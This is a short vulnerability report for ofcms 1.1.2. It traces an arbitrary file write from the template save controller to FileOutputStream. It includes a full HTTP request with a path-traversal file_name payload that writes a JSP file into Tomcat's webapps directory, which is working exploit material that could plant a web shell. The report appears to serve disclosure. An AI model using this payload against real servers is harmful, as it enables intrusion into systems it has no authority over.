Vulnerability product: ofcms
Vulnerability version: 1.1.2
Source code link: https://gitee.com/oufu/ofcms/releases/download/V1.1.2/ofcms-admin.war
Vulnerability type: Write any file
Vulnerability details:
The save method in the ofcms-admin\src\main\java\com\ofsoft\cms\admin\controller\cms\TemplateController.java file did not process the value of the received file_name and was directly passed into the new FileOutputStream function in the write String method of the ofcms-admin\src\main\java\com\ofsoft\cms\core\uitle\FileUtils.java file for reading and writing.

Code audit process:
The file ofcms-admin\src\main\java\com\ofsoft\cms\admin\controller\cms\TemplateController.java did not process the incoming file_name parameter

Then directly use new FileOutputStream to process it

Vulnerability reproduction:
Backend administrator privileges

POST /ofcms-admin/admin/cms/template/save.json HTTP/1.1
Host: 192.168.74.150:8080
Content-Length: 46
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.74.150:8080
Referer: http://192.168.74.150:8080/ofcms-admin/admin/f.html?p=system/log/index.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=BE6318C477E70A8CE8C82EB63282452D
Connection: close

file_name=/../../../../1.jsp&file_content=test

The JSP file has been written into the webapps directory of Tomcat